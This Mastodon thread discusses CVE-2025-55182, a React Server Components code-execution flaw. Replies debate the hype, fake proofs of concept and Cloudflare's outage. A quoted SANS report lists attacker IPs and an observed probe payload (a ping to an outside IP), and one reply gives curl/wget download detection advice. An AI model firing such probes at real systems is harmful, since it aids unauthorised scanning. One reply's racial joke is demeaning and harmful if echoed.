Kevin Beaumont

There is an unauthenticated remote code execution vulnerability in React Server Components.

Even if your app does not implement any React Server Function endpoints it may still be vulnerable if your app supports React Server Components.

If your app’s React code does not use a server, your app is not affected by this vulnerability.

CVE-2025-55182

Mastodon server not impacted btw.

https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components

Critical Security Vulnerability in React Server Components – React

The library for web and native user interfaces

Dec 3 at 4:24pmWeb
Show threadKevin BeaumontDec 3
Vulnerability hype train derail time - these vulns only apply to React 19 (released within the past year) and only when using a specific new feature, React Server.
Show threadKevin BeaumontDec 4

The React vulns have the usual panicked nonsense going on - people posting fake PoCs (all of them are fake), people spraying fake PoCs over the whole internet, people posting screenshots of fake PoC activity thinking it real, doomsday scenario posts etc etc.

It’s actually a niche scenario bug for vast majority of orgs, just stay calm and patch if you are actually impacted (spoiler: you probably aren’t).

Show threadKevin BeaumontDec 5
We have our first victim of overreacting to the React vuln - the Cloudflare global outage was them taking down their own service while trying to spot an actually very niche vuln.
Show threadKevin BeaumontDec 5
New by me - cybersecurity industry overreacts to React vulnerabilities, sets itself on fire https://doublepulsar.com/cybersecurity-industry-overreacts-to-react-vulnerability-starts-panic-burns-own-house-down-again-e85c10ad1607
Show threadKevin BeaumontDec 5

Really interesting thing happening with the React vuln where lots of the cyber companies reporting exploitation don't appear to realise they're reporting on exploit attempts for GitHub PoCs which aren't actually real - said PoCs just set up a vuln webapp in a way nobody would in real world.

It's not all the attempts but it's a large portion.

Me:

Show threadKevin BeaumontDec 5
Similarly attacks are spraying the internet with PoCs where I don't think they realise they don't actually work, largely. Cybersecurity is great, I love it.
Show threadKevin BeaumontJan 5

I keep seeing all the vendor write ups about botnets using that React vuln.. but I’m not sure the vendors understand that botnets integrating something does not equal success.

The whole thing has been pretty eye opening.

Show threadbenyameanJan 5

@GossiTheDog from what I've seen (from friends in DFIR and random posts in r/nextjs) it was fairly successfully exploited, but usually at least one attacker would drop cryptominer or something dumb like that, so breach would quickly get detected.

I dont think it's quite like "spring4shell" and similar vulns that got integrated into botnets but basically never pwned anyone

Show threadJérôme MeyerJan 5
@GossiTheDog we’ve been seeing some DDoS attacks from React bots (likely rondodox, but haven’t really bothered confirming) — pretty small scale, all things considered.
Show threaduoxcDec 5
@GossiTheDog vendors get marketing opportunities and are happy, attackers get to feel cool playing with new toys and are happy, no one gets hacked, it's a win/win/win
Show threadV4N4D1SDec 5
@GossiTheDog
Show threadgregR ☯Dec 5
@GossiTheDog https://infosec.exchange/@sans_isc/115667945271283687
Can I haz pop-corn ?
SANS Internet Storm Center - SANS.edu - Go Sentinels! (@[email protected])

No surprise: We do see active hits of the React Vulnerability (CVE-2025-55182) against our honeypots. The initial exploit attempts we are seeing originate from the following two IP addresses: 193.142.147.209 and 95.214.52.170. The payloads are either "ping -c 1 45.157.233.80" or "console.log('CVE-2025-55182-VULN')" If you find an unpatched React app in your environment, you should assume that it has been compromised at this point. Also be careful with apps that may have pinned older versions fo React/Next.js

Infosec Exchange
Show threadsnaeqeDec 5
@GossiTheDog
One does not simply overreact over react
Show threadSimon Zerafa (Status:   😊)Dec 5

@GossiTheDog

Perhaps this needs to be called the OVER REACT bug? 😉

Still, an alleged 10.0 is quite an achievement.

PoC via @maple3142

https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3

CVE-2025-55182.http

GitHub Gist: instantly share code, notes, and snippets.

Gist
Show threadDavid Penfold Dec 5
@GossiTheDog Apparently there's a whole load of AI-generated bunkum PoCs.
Show threadSwiftOnSecurityDec 6
@GossiTheDog thank you
Show threadScott Leggett  Dec 8

@GossiTheDog The bit I think you might be missing is that Next.js has been vulnerable in every 15.x and 16.x release since January 2025 until last week.

11 months is not "new" in the JS world. In fact, I'd imagine in the age of dependabot et. al. more Next.js sites would have been vulnerable to this when the vuln dropped than not.

Yes, React Server Components might be niche. But Next.js absolutely is not.

Show threadevariste.gal🌈isDec 5
@GossiTheDog Well, they sell WAF-as-a-Product, so introducing observability to identify CVE-2025-55182 payloads seems a legitimate choice, I don't think it is overreacting in this case
Show threadDJGummikuhDec 5
@GossiTheDog interestingly, at least in my bubble you are the only one placating the React Vuln as out of proportion. I have no shares in this issue so I'm in a luxury position to not really care, but everybody else and their mothers are running around like scared chickens :D
Show threadnachtpfoetchen2️⃣Dec 5
@GossiTheDog often just compliance , „we run zero (high rated) cve infra“ so the security theater has to do something.
Show threadHenryk PlötzDec 5

@GossiTheDog It's all the more hilarious because "uploading a bad WAF configuration change" is so far the leading cause of global CDN outages. That was The Big One in 2019 and they had a detailed writeup on how this isn't going to happen again. And in the mean time crowdstrike gave us a refresher on what global bad configuration deployments look like.

And then cloudflare comes and did it again. Ooops.

(At least this time it only took them 20mins to find the rollback button. Progress, I guess.)

Show threadJPDec 5
@GossiTheDog so glad they rushed to fix that and not their inability to do canary rollouts or manual testing on anything smaller than all of global prod
Show threadApicultor 🐝Dec 5
@GossiTheDog "an actually very niche" 10.0 tho
Show threadfuzzyfuzzyfungusDec 5
@GossiTheDog There isn't; but there probably should be a level of engineering professionalism and change control where "an actor working within the scope of his authorization broke the system" is more damning than "an attacker broke the system" rather than less.
Show threadDark HorseDec 8
@GossiTheDog Yeah, that caused a few hiccups for us as well!
Show threadPerrin42Dec 4

@GossiTheDog

Remember, remember
The Fourth of December
The JavaScript vuln in React
I know of Node reason
This CVE season
The Next patch should be taken back.

Show threadSirBeringerDec 4
@GossiTheDog hmmm, normally Maurice doesn’t post BS
Show threadSnoopDec 4
@SirBeringer @GossiTheDog tbh Maurice said the attempts were using the “fake” POCs.
Show threadSirBeringerDec 4
@Snoop @GossiTheDog ok, that makes sense
Show threadmschade_Dec 5
@GossiTheDog did Qualys really use the Fake POC to show that they reconstructed the vulnerability? https://threatprotect.qualys.com/2025/12/04/react-server-components-rsc-remote-code-execution-vulnerabilities/
Show threadEd SandersDec 5

@GossiTheDog

Just so you know, everything you wrote in the first paragraph about fake PoCs (proof of concepts) is also true about fake PoCs (people of color).

Show threadGNU/KnoppersDec 3
@GossiTheDog and only if you self-host something using RSC, which I suspect most people are not doing. NextJS is famous for only really working on Vercel
Show threadSuzanne Aldrich (she/her)Dec 4
@gnuplusknoppers
Vercel…..doesn't have the best security practices. Don't ask me how I know.
@GossiTheDog
Show threadCat 🐈🥗 (D.Burch) Dec 3
@GossiTheDog Aww... I mean, that's good news!
Show threadCedricDec 3
@GossiTheDog With this many sightings (mostly from Bluesky), there is surely at least a bit of hype: https://vulnerability.circl.lu/vuln/CVE-2025-55182#sightings
cvelistv5 - CVE-2025-55182

Vulnerability-Lookup - Fast vulnerability lookup correlation from different sources.

Show threadAndrew GoldingDec 3

@GossiTheDog I had to doublecheck our FE at work just to be sure we're not using the affected components. Luckily, while React Router (formerly remix) is affected by this, it is only affected if experimental support for React Server Components is enabled.

Meanwhile, this does nothing to lessen the general levels of ire I have for the entire JavaScript and friends ecosystem.

Show threadRyan Clough Dec 4
@GossiTheDog Ooh, I love it when you do that!
Show threadR.C.Dec 3
@GossiTheDog thanks for the fyi, wish there weren't so many things call "react-router" (looking at you @tanstack/react-router) to confuse matters
Show threadMemoryLeechDec 5

@GossiTheDog

Potential exploitation being seen itw, no surprise the miners may be first past the post.

Show threadMemoryLeechDec 5

@GossiTheDog

Regular/rudimentary detection's may pickup post ex in this case. Look for file downloads from hardcoded domains (generally sus outside of some special cases) using your fav wget/curl etc.